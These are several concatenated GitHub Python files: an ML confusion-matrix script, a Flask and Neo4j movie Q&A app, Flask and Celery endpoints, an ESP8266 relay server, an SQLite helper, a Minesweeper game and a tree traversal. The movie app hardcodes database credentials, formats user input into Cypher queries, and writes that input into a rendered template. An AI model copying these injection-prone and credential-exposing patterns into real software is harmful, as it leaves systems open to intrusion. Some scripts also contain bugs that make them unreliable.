def load_data(train_data_path):
X_train = []
Y_train = []
text = open(train_data_path, 'r', encoding='big5')
row = csv.reader(text , delimiter=",")
for i,r in enumerate(row):
if i == 0:
continue
Y_train.append(int(r[0]))
X_train.append(r[1].split())
return ( np.reshape(np.array(X_train,dtype='int'),(len(X_train),48,48,1)), np.array(Y_train,dtype='int') )
def split_valid_set(X_all, Y_all, percentage):
all_data_size = len(X_all)
valid_data_size = int(all_data_size * percentage)
X_train, Y_train = X_all[0:valid_data_size], Y_all[0:valid_data_size]
X_valid, Y_valid = X_all[valid_data_size:], Y_all[valid_data_size:]
return X_valid, Y_valid
def plotconfusionmatrix(cm, classes,
title='Confusion matrix',
cmap=plt.cm.jet):
"""
This function prints and plots the confusion matrix.
"""
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
plt.imshow(cm, interpolation='nearest', cmap=cmap)
plt.title(title)
plt.colorbar()
tick_marks = np.arange(len(classes))
plt.xticks(tick_marks, classes, rotation=45)
plt.yticks(tick_marks, classes)
thresh = cm.max() / 2.
for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
plt.text(j, i, '{:.2f}'.format(cm[i, j]), horizontalalignment="center",
color="white" if cm[i, j] > thresh else "black")
plt.tight_layout()
plt.ylabel('True label')
plt.xlabel('Predicted label')
def main():
model_path = 'check_point/'+sys.argv[1]
train_data_path = 'data/train.csv'
dev_feats, te_labels = load_data(train_data_path)
dev_feats, te_labels = split_valid_set( dev_feats, te_labels, 0.01 )
print("HHHHH")
emotion_classifier = load_model(model_path)
np.set_printoptions(precision=2)
predictions = emotion_classifier.predict(dev_feats)
predictions = predictions.argmax(axis=-1)
print (predictions)
print (te_labels)
conf_mat = confusion_matrix(te_labels,predictions)
plt.figure()
plot_confusion_matrix(conf_mat, classes=["Angry","Disgust","Fear","Happy","Sad","Surprise","Neutral"])
plt.show()
if __name__=='__main__':
main()
| b01901143/ML2017FALL | hw3/confusion.py | confusion.py | py | 2,433 | python | en | code | 1 | github-code | 36 |
9366591632 | # coding=utf-8
from flask import Flask, jsonify, render_template, request
from py2neo import Graph
import jw.Q_Search as search
import json
import logging
logging.basicConfig(level=logging.WARNING,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',
filename='logs/pro2.log',
filemode='a')
app = Flask(__name__)
graph = Graph(
"http://118.25.74.160/",
port= 7474,
username="neo4j",
password="jinwei"
)
f = open("recommend_list.json","r")
d = json.loads(f.read())
f.close()
def buildNodes_g(nodeRecord):
data = {"id": str(nodeRecord['g']['gid']), "name": str(nodeRecord['g']['name']),"label":"Genre"}
return {"data": data}
def buildNodes_m(nodeRecord):
data = {"id": str(nodeRecord['m']['mid']), "name": str(nodeRecord['m']['title']), "label":"Movie"}
return {"data": data}
def buildNodes_p(nodeRecord):
data = {"id": str(nodeRecord['n']['pid']),
"name": str(nodeRecord['n']['pname']) if nodeRecord['n']['pname']!=None else nodeRecord['n']['eng_name'],
"label":"Person"}
return {"data": data}
def buildEdges(relationRecord):
data = {"source": str(relationRecord['r']['mid']),
"target": str(relationRecord['r']['gid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def buildEdges_act(relationRecord):
data = {"source": str(relationRecord['r']['pid']),
"target": str(relationRecord['r']['mid']),
"relationship": relationRecord['r']._Relationship__type}
return {"data": data}
def get_recommendation(entities):
try:
q = list(entities.values())[0]
print(q)
global d
return d[q]
except:
return "周星驰, 葛优, 巩俐, 冯小刚</div><div>功夫, 十面埋伏, 霸王别姬, 黄飞鸿"
@app.route('/')
def hello_world():
logging.warning("====== user ip: {} ======".format(request.remote_addr))
return render_template('index000.html')
@app.route('/search', methods=['GET'])
def index1():
return render_template('index1.html')
@app.route('/search', methods=['POST'])
def index2():
query = request.form['Search']
logging.warning("====== Query: {} ======".format(query))
#query = query.replace("\n","")
global entities
entities,answer = search.get_query_type(query)
f = open("./templates/index2.html", 'w',encoding="utf-8")
message_front ='''<!DOCTYPE html>
<html>
<head>
<title>Knowledge Graph</title>
<link href="/static/css/style.css" rel="stylesheet" />
<script src="http://cdn.bootcss.com/jquery/1.11.2/jquery.min.js"></script>
<script src="http://cdn.bootcss.com/cytoscape/2.3.16/cytoscape.min.js"></script>
<script src="/static/js/code.js"></script>
</head>
<body>'''
question = '<h3>Your Question</h3>\n<div>'+str(query).replace('\n','')+ '</div>\n'
recommendation = '<h3>You Might Like this</h3><div>'+get_recommendation(entities)+'</div>'
answer = '<h3>Answer</h3>\n<div>' + str(answer).replace('\n','<br>') + "</div>\n"
message_back='''<h3>Movie Graph</h3>
<div id="cy"></div>
</body>
</html>'''
f.write(message_front+question+answer+recommendation+message_back)
f.close()
return render_template('index2.html')
@app.route('/graph')
def get_graph():
try:
nodes = list(map(buildNodes_m, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN m'''.format(entities[0]))))
nodes = nodes+list(map(buildNodes_p, graph.run('''MATCH (n:Person)-[:actedin]->(m:Movie) where n.pname='{}' RETURN n'''.format(entities[0]))))
edges = list(map(buildEdges_act, graph.run('''MATCH (n:Person)-[r]->(m:Movie) where n.pname='{}' RETURN r limit 100'''.format(entities[0]))))
except:
try:
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN m'''.format(entities[1]))))
nodes = nodes+list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[:actedin]->(m:Movie) where m.title='{}' RETURN n limit 100'''.format(entities[1]))))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="{}" RETURN g'''.format(entities[1]))))
edges = list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title='{}' RETURN r limit 100'''.format(entities[1]))))
edges = edges + list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="{}" RETURN r limit 100'''.format(entities[1]))))
except:
#print("=============Here is OK=============")
nodes = list(map(buildNodes_m, graph.run(
'''MATCH (m:Movie)-[:is]->() where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN m''')))
nodes = nodes + list(map(buildNodes_g, graph.run(
'''MATCH (m:Movie)-[:is]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN g''')))
nodes = nodes + list(map(buildNodes_p, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN n''')))
edges = list(map(buildEdges, graph.run(
'''MATCH (m:Movie)-[r]->(g:Genre) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
edges = edges + list(map(buildEdges_act, graph.run(
'''MATCH (n:Person)-[r]->(m:Movie) where m.title="2046" or m.title= "Qin Yong" or m.mid=146 or m.mid=53281 RETURN r limit 100''')))
#print("=============Here is OK=============")
# nodes = map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n'))
# edges = map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r'))
return jsonify(elements = {"nodes": nodes, "edges":edges})
if __name__ == '__main__':
app.run(debug = True) | ChandlerBang/Movie-QA-System | flask_app.py | flask_app.py | py | 6,282 | python | en | code | 58 | github-code | 36 |
31872554645 | import os
from services.connect import *
from flask import Blueprint, jsonify, request
from flask_cors import cross_origin
from dotenv import load_dotenv
import uuid
load_dotenv()
review_blueprint = Blueprint('reviews', __name__)
MONGODB_CONNECTION_STRING = os.getenv("MONGO_URI")
MONGODB_DATABASE = 'ch'
# POST create a user
@review_blueprint.route('/reviews', methods=['POST'])
@cross_origin(headers=['Content-Type', 'Authorization'])
def create_review():
data = request.get_json()
client, collection = connect_mongo('reviews')
newReview = {}
newReview['_id'] = uuid.uuid4()
newReview['title'] = data['title']
newReview['ratings'] = data['ratings']
newReview['content'] = data['content']
collection.insert_one(newReview)
client.close()
return jsonify(newReview), 201
| dp3why/dessert-service | controllers/review_controller.py | review_controller.py | py | 819 | python | en | code | 0 | github-code | 36 |
16256225108 | from relay import Relay
r = Relay()
html = ""
with open("pcb2.html", 'r') as f:
html = f.read()
def web_page():
if r.get_value():
r_state = "ON"
else:
r_state = "OFF"
return html.replace('r_state', r_state)
def serve():
while True:
conn, addr = s.accept()
request = conn.recv(1024)
if not request:
continue
try:
command = request.split()[1][4:]
except Exception as e:
log_data(str(e))
log_data('Request {0}'.format(request.decode()))
if command == b'on':
r.on()
elif command == b'off':
r.off()
response = web_page()
conn.send('HTTP/1.1 200 OK\n')
conn.send('Content-Type: text/html\n')
conn.send('Connection: close\n\n')
conn.sendall(response)
conn.close()
log_data = 'Connected from: {0} with request: {1}'.format(addr[0], request.decode())
# print(log_data)
log_write(log_data)
gc.collect()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 80))
s.listen(5)
serve()
except KeyboardInterrupt as e:
log_write(str(e))
pass
except Exception as e:
log_write(str(e))
if 'EADDRINUSE' in str(e):
machine.reset()
finally:
log_write('Closing Socket')
s.close()
gc.collect()
| lalondesteve/py8266 | on_off_server/main.py | main.py | py | 1,399 | python | en | code | 0 | github-code | 36 |
72692990823 | import sqlite3
class Db:
"""
A class used to represent database(Db)
"""
def __init__(self, database):
self.conn = sqlite3.connect(database, check_same_thread=False)
self.conn.row_factory = sqlite3.Row
self.cursor = self.conn.cursor()
def execute(self, query):
self.cursor.execute(query)
self.conn.commit()
def fetchall(self, query):
self.cursor = self.conn.cursor()
self.execute(query)
result = [dict(row) for row in self.cursor.fetchall()]
return result
def close(self):
self.conn.close()
def setup(self, data):
self.create_classes_table()
self.create_animals_table()
for d in data:
self.insert_data_from_csv(d[0], d[1])
def create_animals_table(self):
query = '''
create table animals
(id integer not null, animal_name text, hair integer, feathers integer, eggs integer, milk integer, airborne integer,
aquatic integer, predator integer, toothed integer, backbone integer, breathes integer, venomous integer,
fins integer, legs integer, tail integer, domestic integer, catsize integer, class_type integer,
primary key (id), foreign key (class_type) references classes(id))'''
self.execute(query)
def create_classes_table(self):
query = '''
create table classes
(id integer not null, number_of_animal_species_in_class integer, class_type text,
primary key (id))
'''
self.execute(query)
def insert_data_from_csv(self, csv_path, table):
with open(csv_path, 'r') as file:
next(file)
for line in file:
line = line.strip().split(',')
line[0] = f"'{line[0]}'" if not line[0].isdigit() else line[0]
line[1] = f"'{line[1]}'" if not line[1].isdigit() else line[1]
query = f'insert into {table} values (null, {", ".join(line)})'
self.execute(query)
# def add_foreign_key(self, table, foreign_key, ref_table, ref_column):
# query = f'''
# alter table {table}
# add foreign key ({foreign_key}) references {ref_table}({ref_column})'''
# print(query)
# self.execute(query)
| madeleinema-cee/think-of-an-animal-flask | db.py | db.py | py | 2,372 | python | en | code | 0 | github-code | 36 |
16096100007 | import pygame
import minesweeper_map as mm
pygame.init()
class minesweeper_tile():
def __init__(self, v, f=False, h=True):
self.value = v
self.flag = f
self.hidden = h
def set_value(self, v):
self.value = v
def set_flag(self):
self.flag = not self.flag
def set_hidden(self):
self.hidden = not self.hidden
class minesweeper_game():
TILE_SIZE = 20
LEFT_MOUSE_BUTTON, RIGHT_MOUSE_BUTTON = 1, 3
game_over = False
win = False
img = pygame.image.load('minesweeper_icons.png')
images = []
for i in range(12):
images.append(img.subsurface(TILE_SIZE*i, 0, TILE_SIZE, TILE_SIZE))
def __init__(self, size, bombs):
self.mmap = mm.minesweeper_map(size, bombs)
self.board_size = self.mmap.get_board_size()
self.create_tile_board()
self.create_window(self.board_size, bombs)
self.run_game()
def create_tile_board(self):
self.tile_board = [[minesweeper_tile(0) for _ in range(self.mmap.get_board_size())]
for _ in range(self.mmap.get_board_size())]
for r in range(len(self.mmap.get_board())):
for c in range(len(self.mmap.get_board()[r])):
self.tile_board[r][c].value = self.mmap.get_board()[r][c]
def create_window(self, size, bombs):
self.window = pygame.display.set_mode((size*self.TILE_SIZE, size*self.TILE_SIZE))
pygame.display.set_caption('%s Bombs Total' % (bombs))
def run_game(self):
running = True
while running:
pygame.time.delay(int(1000/60))
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
if e.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_interaction(e)
self.draw_window()
if self.game_over:
pygame.display.set_caption('Game Over')
pygame.time.delay(1000)
running = False
if self.win:
pygame.display.set_caption('You\'ve Won!')
pygame.time.delay(1000)
running = False
pygame.quit()
def handle_mouse_interaction(self, e):
x, y = int(pygame.mouse.get_pos()[0]/self.TILE_SIZE), int(pygame.mouse.get_pos()[1]/self.TILE_SIZE)
corr_tile = self.tile_board[x][y]
if corr_tile.hidden:
if e.button == self.LEFT_MOUSE_BUTTON:
self.handle_hidden(x, y)
if self.get_win():
self.win = True
elif e.button == self.RIGHT_MOUSE_BUTTON:
self.tile_board[x][y].set_flag()
if corr_tile.value == mm.minesweeper_map.BOMB:
if e.button == self.LEFT_MOUSE_BUTTON:
self.game_over = True
def get_win(self):
for row in self.tile_board:
for cell in row:
if cell.hidden and cell.value is not self.mmap.BOMB:
return False
return True
def handle_hidden(self, x, y):
self.tile_board[x][y].set_hidden()
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x-1, y):
if self.tile_board[x-1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x-1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x+1, y):
if self.tile_board[x+1][y].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x+1, y)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y-1):
if self.tile_board[x][y-1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y-1)
if mm.is_valid_place(self.board_size, self.mmap.get_board(), x, y+1):
if self.tile_board[x][y+1].hidden and self.tile_board[x][y].value is 0:
self.handle_hidden(x, y+1)
def draw_window(self):
for r in range(len(self.tile_board)):
for c in range(len(self.tile_board[r])):
c_tile = self.tile_board[r][c]
if c_tile.flag:
self.window.blit(self.images[11], (r*self.TILE_SIZE, c*self.TILE_SIZE))
elif c_tile.hidden:
self.window.blit(self.images[10], (r*self.TILE_SIZE, c*self.TILE_SIZE))
else:
self.window.blit(self.images[self.tile_board[r][c].value], (r*self.TILE_SIZE, c*self.TILE_SIZE))
pygame.display.update() | mjd-programming/Minesweeper | minesweeper_game.py | minesweeper_game.py | py | 4,549 | python | en | code | 0 | github-code | 36 |
34715801253 | from __future__ import absolute_import
from os import environ
import json
from flask import Flask, jsonify, request
import settings
from celery import Celery
import urllib2
app = Flask(__name__)
app.config.from_object(settings)
'''
==========================================
============= CELERY Section =============
==========================================
'''
def make_celery(app):
celery = Celery(app.import_name, backend='amqp', broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
return celery
celery = make_celery(app)
@celery.task(name='tasks.currentHomeTemp')
def currentHomeTemp():
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/NY/Whitesboro.json')
json_string = f.read()
parsed_json = json.loads(json_string)
location = parsed_json['location']['city']
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature in %s is: %s" % (location, temp_f)
@celery.task(name='tasks.currentZipcodeTemp')
def currentZipcodeTemp(zipcode):
f = urllib2.urlopen('http://api.wunderground.com/api/'
+ app.config['WUNDERGROUND_KEY']
+ '/geolookup/conditions/q/' + zipcode + '.json')
json_string = f.read()
parsed_json = json.loads(json_string)
temp_f = parsed_json['current_observation']['temp_f']
f.close()
return "Current temperature at zipcode %s is: %s" % (zipcode, temp_f)
@celery.task(name="tasks.add")
def add(x, y):
return x + y
'''
==========================================
============= FLASK Section ==============
==========================================
'''
@app.route('/')
@app.route('/myassistant')
@app.route('/myassistant/index')
@app.route('/myassistant/index.html')
def index():
return 'Hello World!!'
@app.route("/myassistant/test")
def hello_world(x=16, y=16):
x = int(request.args.get("x", x))
y = int(request.args.get("y", y))
res = add.apply_async((x, y))
return generateTaskIdJson(res)
@app.route("/myassistant/result/<task_id>")
def show_result(task_id):
retval = add.AsyncResult(task_id).get(timeout=1.0)
return repr(retval)
@app.route('/myassistant/weather/home/temp/current')
def homeWeather():
res = currentHomeTemp.apply_async()
return generateTaskIdJson(res)
@app.route('/myassistant/weather/<zipcode>/temp/current')
def currentTempAtZip(zipcode):
res = currentZipcodeTemp.delay(zipcode)
return generateTaskIdJson(res)
'''
==========================================
=========== UTILITY Section ==============
==========================================
'''
def generateTaskIdJson(taskResult):
context = {"id": taskResult.task_id,
"url": 'http://' + app.config['CALLBACK_IP']
+ ':'
+ str(app.config['CALLBACK_PORT'])
+ '/myassistant/result/'
+ taskResult.task_id}
return jsonify(context)
'''
==========================================
============== MAIN Section ==============
==========================================
'''
if __name__ == "__main__":
port = int(environ.get("PORT", app.config['LISTEN_PORT']))
app.run(host=app.config['LISTEN_ADDRESS'], port=port, debug=True) | elihusmails/myassistant | src/app/tasks.py | tasks.py | py | 3,707 | python | en | code | 0 | github-code | 36 |
22704609724 | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def zigzagLevelOrder(self, root):
"""
:type root: TreeNode
:rtype: List[List[int]]
"""
if not root:
return []
level = [root]
res = []
res2 = []
level2 = 0
while level:
queue = []
level2 += 1
for i in level:
res.append(i.val)
if i.right:
queue.append(i.right)
if i.left:
queue.append(i.left)
level = queue
res = res[::-1] if level2 % 2 == 1 else res
res2.append(res)
res = []
return res2
| CHENG-KAI/Leetcode | 103_binary_tree_zigzag_level_order_traversal.py | 103_binary_tree_zigzag_level_order_traversal.py | py | 873 | python | en | code | 0 | github-code | 36 |
29903913111 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 11 18:22:46 2020
@author: Zamberlam
"""
def isIn(char, aStr):
'''
char: a single character
aStr: an alphabetized string
returns: True if char is in aStr; False otherwise
'''
if aStr == '':
return False
if len(aStr) == 1:
return aStr == char
midpos = len(aStr) // 2
midchar = aStr[midpos]
if char == midchar:
return True
elif char < midchar:
return isIn(char, aStr[:midpos])
else:
return isIn(char, aStr[midpos:]) | FZamberlam/MITx-6.00.1x-Python | Week_2_-_Simple_Programs/Exercises/isIn.py | isIn.py | py | 637 | python | en | code | 0 | github-code | 36 |
13780023529 | import sys
sys.setrecursionlimit(10 ** 9)
def preorder(root):
print(root, end = "")
left = tree[root][0]
right = tree[root][1]
if left != ".":
preorder(left)
if right != ".":
preorder(right)
def inorder(root):
left = tree[root][0]
right = tree[root][1]
if left != ".":
inorder(left)
print(root, end = "")
if right != ".":
inorder(right)
def postorder(root):
left = tree[root][0]
right = tree[root][1]
if left != ".":
postorder(left)
if right != ".":
postorder(right)
print(root, end = "")
tree = dict()
for _ in range(int(sys.stdin.readline().strip())):
root, left, right = sys.stdin.readline().strip().split()
tree[root] = [left, right]
preorder('A')
print()
inorder('A')
print()
postorder('A')
| Yangseyeon/BOJ | 02. Silver/1991.py | 1991.py | py | 831 | python | en | code | 0 | github-code | 36 |
13823173820 | # we are going to make 3D spiral in vs code using python
import turtle as dk
import colorsys
dk.bgcolor('black')
dk.speed('fastest')
dk.pensize(2)
hue=0.0
dk.hideturtle()
for i in range(500):
color=colorsys.hls_to_rgb(hue,0.6,1)
dk.pencolor(color)
dk.fd(i)
dk.rt(98.5)
dk.circle(100)
hue+=0.005
dk.exitonclick()
# now run the code
| DRKAFLE123/allpydraw | pydraw/spiral.py | spiral.py | py | 358 | python | en | code | 0 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.